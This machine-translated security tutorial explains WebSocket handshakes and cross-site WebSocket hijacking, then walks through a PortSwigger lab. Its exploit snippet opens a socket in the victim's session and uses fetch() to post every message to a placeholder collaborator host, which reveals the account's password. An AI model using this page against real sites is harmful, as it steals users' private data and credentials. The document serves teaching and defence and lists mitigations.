Statement ： This article is limited to technical discussion and sharing , It is strictly forbidden to use it in illegal ways . If readers do any harm to network security, they will bear the consequences , It has nothing to do with this number and the original author .

WebSocket Hijacking vulnerability Guide

WebSocket Protocol technology

WebSocket yes HTML5 New agreement launched , Is based on TCP Application layer communication protocol , It is associated with http The content of the agreement itself does not matter .WebSocket Similar to TCP Handshake connection , Follow TCP The difference is ,WebSocket Is based on HTTP Handshake by agreement , It provides a single based between the client and the server TCP High efficiency full duplex communication channel connected

websocket Is a persistent agreement , and http Yes no lasting

When the communication protocol changes from http:// or https:// Switch to ws:// or wss:// after , Indicates that the application has been switched to WebSocket Protocol communication status

WebSocket The establishment of a connection requires a connection request 、 handshake 、 There are three steps to establish a connection , Here's the picture

establish WebSocket Connect

WebSocket The connection usually uses the client JavaScript Created

var ws = new WebSocket("
wss://normal-website.com/chat");
// The `wss` The protocol is based on an encrypted TLS Connected WebSocket, and `ws` The protocol uses an unencrypted connection .

To establish a connection , Browser and server through HTTP perform WebSocket handshake . The browser sends out WebSocket Handshake request , As shown below ：

GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket

If the server accepts the connection , It will return WebSocket Handshake response , As shown below ：

HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=

here , The network connection remains open , And it can be used to send WebSocket news .

Request and response Of Connection and Upgrade The header indicates that this is WebSocket handshake

WebSocket Security vulnerabilities

In principle, , because WebSocket It involves many levels , Anything to do with WebSocket Relevant web Security vulnerabilities are possible

• User input transmitted to the server is handled in an unsafe manner , appear SQL Injection or XML External entity injection, etc

• adopt WebSockets Some blind holes reached (blind vulnerabilities) You may only use out of band (OAST) Technology can detect

• If the data controlled by the attacker passes WebSockets Transfer to other application users , May lead to XSS Or other client vulnerabilities

  This article mainly discusses cross-site WebSocket Hijacking loopholes -CSWSH

【---- Help network security learn , All the following learning materials are free ！ Add weix：yj009991, remarks “ csdn ” obtain ！】

　① Thinking map of the growth path of Network Security Learning

　② 60+ Network security classic common toolkit

　③ 100+SRC Vulnerability analysis report

　④ 150+ Network security attack and defense technology ebook

　⑤ The most authoritative CISSP Certification test guide + Question bank

　⑥ super 1800 page CTF Practical skills manual

　⑦ A collection of the latest interview questions from Wangan factory （ With answers ）

　⑧ APP Client security detection guide （ Android +IOS）

cross-site WebSocket Hijacking loopholes

What is cross station WebSocket Hijacking loopholes

Websocket The security features brought by it alleviate the attacks of some features to a certain extent , But with the development of attack methods , Its related vulnerabilities have also been exposed , One of the most common vulnerabilities is CSWSH(Cross-Site WebSocket Hijacking) cross-site WebSocket Hijacking loopholes

We can see WebSocket Link process with http Is very similar ,WebSocket The protocol is based on HTTP Of . It does not stipulate how the server verifies the identity of the client during the handshake , therefore , The server needs to adopt http Client authentication mechanism to identify identity , As is common cookie、http Head basic certification, etc . This leads to vulnerable attackers using malicious web pages to disguise the identity of users , Build with server WebSocket Connect

CSWSH And Cross Site Request Forgery CSRF The principle of vulnerability is very similar

  Compare with CSRF Vulnerability can only send forged requests , cross-site WebSocket Hijacking vulnerabilities can create a complete read / Write two-way channel , And it is not limited by the homology strategy , This has caused greater harm and operability in a great sense

cross-site WebSocket Possible impact of hijacking vulnerability

• Perform unauthorized operations caused by fake users

And Convention CSRF similar , An attacker can fake the generated WebSocket Channel to perform some sensitive operations

• Retrieve sensitive data that users can access

And Convention CSRF When it's different ,CSWSH It is to establish a two-way interactive channel , When the client sends sensitive data to the user , Attackers can intercept and record sensitive information

cross-site WebSocket Hijacking vulnerability range demonstration

Target environment

• shooting range

With the help of burpsuite Training ground

Lab: Cross-site WebSocket hijacking | Web Security Academy (portswigger.net)

• Browser environment

edge browser

Range analysis

• Click to start the shooting range

• It is observed that there is a real-time chat interface , Did you observe CSRF The token

• Copy code to body

<script>
var ws = new WebSocket('wss://your-websocket-url');
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(event) {
fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>

• wss://your-websocket-url Replace with the current url

•
https://your-collaborator-url Replace with Burp Collaborator Client Or build it yourself Burp Collaborator The server

• You can click on the view exploit test , It can also be sent directly to the attacker

• And then in Burp Collaborator Client many poll A few

• Check the account and password

  Then I choose to use dnslog Verify it

  It can really bring out data , Perform sensitive operations

How to prevent cross station WebSocket Hijacking loopholes

• check Origin head

• Two way will WebSocket The transmitted data is considered untrusted

• Yes WebSocket Handshake information for encryption protection

• Hard encoding WebSockets Of the endpoint URL

More range experiments 、 Network security learning materials , Please click here >>https://www.hetianlab.com/